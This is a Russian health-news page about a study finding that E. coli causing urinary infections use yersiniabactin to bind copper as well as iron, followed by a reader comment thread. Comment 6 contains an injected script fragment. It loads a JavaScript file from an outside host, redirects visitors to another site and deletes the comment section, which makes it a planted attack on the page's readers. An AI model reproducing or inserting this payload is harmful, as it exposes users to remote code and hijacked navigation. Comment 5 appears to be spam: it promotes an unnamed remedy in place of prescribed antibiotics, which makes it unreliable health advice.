Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Новый способ выживания ба...  >>  Новый способ выживания бактерий
 
Обратная связь
 

Новый способ выживания бактерий

Размер шрифта
06 августа 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Известно, что медь является эффективным средством против инфекций. Оказывается, бактерии, вызывающие тяжелые инфекции мочевыводящих путей, «крадут» медь у нас в организме, чтобы она не нанесла им вреда.

бактерия

Инфекции мочевыводящих путей

Инфекции мочевыводящих путей развиваются в том случае, когда в почки или мочевой пузырь попадают бактерии, которые начинают размножаться в моче.

Поскольку бактерии попадают в мочевыводящие пути через мочеиспускательный канал (так называемая восходящая инфекция), то основным фактором риска развития заболевания является несоблюдение правил личной гигиены. Кроме того, риск повышается при наличии сахарного диабета и пороков развития мочевыводящих путей; у женщин – при активной сексуальной жизни и беременности; у мужчин – при увеличении предстательной железы.

Одним пациентам удается легко вылечить инфекцию, в то время как другие не могут справиться с заболеванием, несмотря на применение антибиотиков. В некоторых случаях возбудитель может попасть в почки или даже в кровь, что угрожает жизни пациента. Основным возбудителем инфекций мочевыводящих путей является кишечная палочка. Известно, что кишечная палочка выделяет особое вещество иерсиниябактин, который «ворует» ионы железа у клеток организма-хозяина. На основании предыдущих исследований ученые предположили, что данное вещество связывает не только ионы железа.

Суть исследования

Ученые поместили иерсиниябактин в мочу здоровых людей и обнаружили, что данное вещество связывает не только железо, но и медь. Затем они провели анализ образцов мочи, полученной от пациентов с инфекциями мочевыводящих путей. Оказалось, что практически у всех пациентов иерсиниябактин был связан с медью, причем количество связанной меди было больше, чем связанного железа. Следует отметить, что не все кишечные палочки вырабатывают иерсиниябактин, но те, которые его вырабатывают, обладают повышенной устойчивостью к неблагоприятным условиям.

Полезные свойства меди

Антибактериальные свойства меди известны еще с древних времен: в Древней Греции и Древнем Египте медь использовали для ускорения заживления ран. С точки зрения современной науки уникальные свойства меди обусловлены тем, что она, во-первых, стимулирует выработку веществ, вызывающих повреждение бактерий, а, во-вторых, оказывает на бактерии прямое токсическое воздействие.

В настоящее время ученые продолжают исследования и пытаются найти другие бактерии, которые вырабатывают иерсиниябактин. Им важно понять, могут ли какие-либо бактерии, помимо кишечной палочки, вызывающей инфекции мочевыводящих путей, использовать медь для своей защиты.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

13 мая 2015 в 17:07

Цитировать   |   Пожаловаться

А это только к инфекциям мочевыводящих путей относится? А то у меня инфекция хеликобактер пилори (которые желудок поражают и язву вызывают), не знаю уже что делать((

2 - Гость

14 мая 2015 в 11:59

Цитировать   |   Пожаловаться

Ну к врачу наверно первым делом обратиться..))а вообще средств эффективных сейчас много) а пока можете начать с питания правильного, гигиены и образа жизни

3 - Гость

15 мая 2015 в 13:38

Цитировать   |   Пожаловаться

Гость 13 мая 2015 в 17:07
А то у меня инфекция хеликобактер пилори (которые желудок поражают и язву вызывают), не знаю уже что делать((
 а вы хоть к врачу обращались? а то паниковать смысла нет, так только ускорите появление язвы(( принимать нужно что-нибудь, что выводит хеликобактер, по опыту могу сказать, что мне помог, но это такое дело, выбирать нужно индивидуально

4 - Гость

18 мая 2015 в 15:56

Цитировать   |   Пожаловаться

к врачу обращалась конечно, но он выписал антибиотики

может я как-то халатно отношусь, но аб не хочу принимать, у меня от них жуткие побочные всегда, да ещё щас иммунитет в принципе ослаблен
вот думаю, может есть какие-то более щадящие способы без жестких лекарств..

5 - Гость

19 мая 2015 в 12:59

Цитировать   |   Пожаловаться

Да нормально вы относитесь, антибиотики принимать никто не хочет, сама искала себе средство, остановилась на в итоге, в принципе по моим требованиям, как раз то что нужно)

6 - zzzzzz

30 июня 2015 в 23:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Девять фактов в пользу синбиотиков   Аппарат, который вы трогаете каждый день, грязнее туалета!   Джакузи вызывают вспышки инфекций!   Оказывается, мочой нельзя мыться! Как же быть?  
03 августа 2012У бактерий появился новый способ выживания 25 июня 2012Ожирение вызывают микробы, живущие в кишечнике!
 
17 июля 2012Микробы делают нас счастливыми! 28 марта 2013Язва желудка защищает от инфаркта и рака
 

Слайдшоу

1
Продукты, которые нельзя употреблять с лекарствами
Инфекции мочеполовой системы
Простые правила здоровья мочевого пузыря

Тесты

1
Что скрывает ваша моча?
Что вы знаете о цистите?
Цистит: как с ним бороться
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.